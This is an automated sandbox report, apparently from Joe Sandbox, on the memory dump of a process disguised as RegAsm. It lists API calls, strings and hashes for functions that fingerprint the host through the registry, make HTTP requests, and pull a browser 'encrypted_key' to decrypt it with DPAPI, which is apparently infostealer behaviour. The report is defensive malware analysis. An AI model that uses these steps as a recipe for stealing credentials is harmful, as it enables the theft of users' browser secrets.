                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                    • String ID: %d MB$@
                                                    • API String ID: 2886426298-3474575989
                                                    • Opcode ID: e44640eb945edcdb330fccb508c3ea3b329ff7572ab2c3ac08101b3669067511
                                                    • Instruction ID: da943534dc948d73dd967abc6d37c718adf03b454bdf056c0f5a7879574b1967
                                                    • Opcode Fuzzy Hash: e44640eb945edcdb330fccb508c3ea3b329ff7572ab2c3ac08101b3669067511
                                                    • Instruction Fuzzy Hash: 71015EB0E40218BFEF00AFE0DC0ABADBBB9FB05749F104409F314B9090C7B866519B58
                                                    Function 0040430F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 70stringnetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CrackInternetlstrlen
                                                    • String ID: <$<
                                                    • API String ID: 1274457161-213342407
                                                    • Opcode ID: 94d81e5e955a971915de60a229a9877af64f0f003ab4a34939c35b93bd59b886
                                                    • Instruction ID: 01f5d62e614e23a6b162f059a70a9e0953d43a02f97c16b9683ed6508c4b1ff7
                                                    • Opcode Fuzzy Hash: 94d81e5e955a971915de60a229a9877af64f0f003ab4a34939c35b93bd59b886
                                                    • Instruction Fuzzy Hash: 48214771D00218AFDB10DFA9E881BCDBBB4BB04324F10815AE669F72A0DB345A85CF10
                                                    Function 00417F35 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00406312: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406373
                                                      • Part of subcall function 00406312: StrCmpCA.SHLWAPI(?), ref: 00406390
                                                      • Part of subcall function 00406312: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004063BE
                                                      • Part of subcall function 00406312: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 0040640A
                                                      • Part of subcall function 00406312: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406442
                                                      • Part of subcall function 00406312: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406453
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00417F96
                                                    • lstrlenA.KERNEL32(00000000), ref: 00417FAD
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00417FDD
                                                    • lstrlenA.KERNEL32(00000000), ref: 00417FF9
                                                    • lstrlenA.KERNEL32(00000000), ref: 0041801F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                                    • String ID: ERROR
                                                    • API String ID: 3240024479-2861137601
                                                    • Opcode ID: e56dbd6892063ce075c71f30584f65b6369d35785078b77fb4a32cfd08f74c49
                                                    • Instruction ID: 82a00ccf74cc6928f093117e63f16261f372f6c033bbdc91f1bb176def9d3ff2
                                                    • Opcode Fuzzy Hash: e56dbd6892063ce075c71f30584f65b6369d35785078b77fb4a32cfd08f74c49
                                                    • Instruction Fuzzy Hash: 24511A71910108ABCB04FFA1D956AED7774BF11309F60402EF916A61F2DF39AA89CA48
                                                    Function 004125CA Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 004125F2
                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00412612
                                                    • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00412639
                                                    • CharToOemA.USER32(00000000,?), ref: 00412659
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharOpenQueryValuememset
                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                    • API String ID: 1728412123-1211650757
                                                    • Opcode ID: 195b74b0a96cc35dac2f772ac61cfb819d8275be74710b7e5bc2e41235a95a6e
                                                    • Instruction ID: 19f088c07c09de6674c761c0d1b751acc79a05fefe0ca058460f00b60f9401a7
                                                    • Opcode Fuzzy Hash: 195b74b0a96cc35dac2f772ac61cfb819d8275be74710b7e5bc2e41235a95a6e
                                                    • Instruction Fuzzy Hash: 1B016275A4022DBBDB209B50DD4AFDA777CEB14704F5001E1B688F6091DBF46AC48F54
                                                    Function 00407CDF Relevance: 9.1, APIs: 6, Instructions: 74filememoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                    • ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                    • LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                    • CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                    • String ID:
                                                    • API String ID: 2311089104-0
                                                    • Opcode ID: b0c26b6f574b650b3bbe433578a167a4ae74d057130e38fdececdba59a5ca05d
                                                    • Instruction ID: 20c10e672a0f3402bfbef9d3d1be989891e350540804f4a5b6ad44830b3c41ef
                                                    • Opcode Fuzzy Hash: b0c26b6f574b650b3bbe433578a167a4ae74d057130e38fdececdba59a5ca05d
                                                    • Instruction Fuzzy Hash: 6C31F174E00209EFDF11DFA4D849BEE7BB5BF0A301F104065E911AB2A0D778AA91CF55
                                                    Function 00411ADD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411AF1
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411AF8
                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000), ref: 00411B29
                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,?,000000FF), ref: 00411B47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                    • String ID: Windows 11
                                                    • API String ID: 3676486918-2517555085
                                                    • Opcode ID: 346f3f4664875a4ea084d75b8818ec132410f9d5b334d0546c756ba2ab9ffa29
                                                    • Instruction ID: 3f27d459ef3b4295677ace20887899c1ffae7c715c4ca525cf07eb428eb26eef
                                                    • Opcode Fuzzy Hash: 346f3f4664875a4ea084d75b8818ec132410f9d5b334d0546c756ba2ab9ffa29
                                                    • Instruction Fuzzy Hash: 84013C34A44208FBEB10ABE0EC0AB9D7B7AFB06744F1050A5F701AA1A1E7749A94DB14
                                                    Function 00411B5B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411B6F
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411B76
                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00411B06), ref: 00411B95
                                                    • RegQueryValueExA.KERNEL32(00411B06,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00411BB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                    • String ID: CurrentBuildNumber
                                                    • API String ID: 3676486918-1022791448
                                                    • Opcode ID: 6763c454cfa2fbe29bba7aff6e2c919a48f957ef8388f20bd06a009583ecdfc3
                                                    • Instruction ID: 29d7a5e80dbd030fd5711505aedc04f660bf528dc6b38352957baa02463c1007
                                                    • Opcode Fuzzy Hash: 6763c454cfa2fbe29bba7aff6e2c919a48f957ef8388f20bd06a009583ecdfc3
                                                    • Instruction Fuzzy Hash: 42F04F75A40209FFEB00AFE0EC0AFEDBBB9FB05704F101095F200A90A1D7B05690DB54
                                                    Function 0041FD2C Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0041FD9F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 28e4449246bdff4538dfa03a6f885fd424cd5e53fb953e1d424f3e4a8a48cfb0
                                                    • Instruction ID: 5f3c8af357893ed153ccb181933e0c92fd25f58187f5847643f7a6c701f82d74
                                                    • Opcode Fuzzy Hash: 28e4449246bdff4538dfa03a6f885fd424cd5e53fb953e1d424f3e4a8a48cfb0
                                                    • Instruction Fuzzy Hash: D561CE70A00209DFDB10CF54D948BAEB7F1BB04725F258166E515AB391C3B4DE86CB6A
                                                    Function 00407F8E Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00407FDF
                                                      • Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407DE6
                                                      • Part of subcall function 00407DC2: LocalAlloc.KERNEL32(00000040,00406095,?,?,00406095,00000000,?), ref: 00407DF7
                                                      • Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407E1D
                                                      • Part of subcall function 00407DC2: LocalFree.KERNEL32(00000000,?,?,00406095,00000000,?), ref: 00407E31
                                                    • memcmp.MSVCRT ref: 00408034
                                                      • Part of subcall function 00407E41: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407E65
                                                      • Part of subcall function 00407E41: LocalAlloc.KERNEL32(00000040,00000000), ref: 00407E83
                                                      • Part of subcall function 00407E41: LocalFree.KERNEL32(?), ref: 00407EAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                    • String ID: $"encrypted_key":"$DPAPI
                                                    • API String ID: 1204593910-738592651
                                                    • Opcode ID: cb5a7b3697549c6f230e63b8f069386ffd445f3a9418a1f9903da71664ec03a3
                                                    • Instruction ID: 8d589a117900b415cc4759a7c5c28772ff61d9ce457947e60a2fc3858aeb04fe
                                                    • Opcode Fuzzy Hash: cb5a7b3697549c6f230e63b8f069386ffd445f3a9418a1f9903da71664ec03a3
                                                    • Instruction Fuzzy Hash: 74310E71D0010DABDF11DBA5DD45BEEBBB8AF04304F14012AE840B2291EB799A58DB99
